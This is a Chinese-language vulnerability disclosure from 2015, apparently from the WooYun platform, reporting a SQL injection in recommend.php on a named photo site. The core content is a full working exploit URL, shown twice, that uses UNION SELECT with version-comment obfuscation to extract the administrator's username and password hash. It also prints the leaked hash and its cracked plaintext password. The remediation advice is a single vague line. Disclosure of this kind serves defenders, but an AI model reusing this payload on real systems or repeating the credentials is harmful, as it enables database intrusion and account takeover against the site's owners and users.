漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-04-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-08: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
rt,另求邀请码一枚,(*^__^*) 嘻嘻
详细说明:
偶尔测试得来了,感觉还是挺危险的
http://photo.we54.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
admin|c9221396dc825273cdc4
md5破解后明文密码是:we54@6779
主站流量还挺大的,尽快修复!
漏洞证明:
http://photo.we54.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294
admin|c9221396dc825273cdc4
md5破解后明文密码是:we54@6779
修复方案:
修复漏洞或者升级程序
版权声明:转载请注明来源 超级密码@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝